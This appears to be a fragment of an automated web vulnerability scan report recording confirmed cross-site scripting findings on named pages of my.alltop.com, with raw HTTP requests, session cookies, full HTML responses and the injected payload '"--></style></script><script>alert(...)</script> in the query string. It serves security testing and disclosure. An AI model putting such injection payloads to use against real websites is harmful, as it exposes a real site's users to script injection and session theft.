Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:46 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:47 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/i

/alpha/i CONFIRMED

http://my.alltop.com/alpha/i?'"--></style></script><script>alert(0x0001E8)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001E8)</script>

Request

GET /alpha/i?'"--></style></script><script>netsparker(0x0001E8)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:58 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:59 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/o

/alpha/o CONFIRMED

http://my.alltop.com/alpha/o?'"--></style></script><script>alert(0x0001DB)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0001DB)</script>

Request

GET /alpha/o?'"--></style></script><script>netsparker(0x0001DB)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
